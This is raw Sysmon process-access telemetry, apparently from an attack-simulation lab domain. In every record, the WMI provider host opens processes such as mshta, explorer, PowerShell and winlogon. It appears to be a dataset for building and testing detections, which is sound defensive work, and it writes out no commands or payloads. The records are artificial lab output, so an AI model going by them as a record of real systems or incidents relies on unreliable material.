15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535B-6008-4A06-00000000A301}7228C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 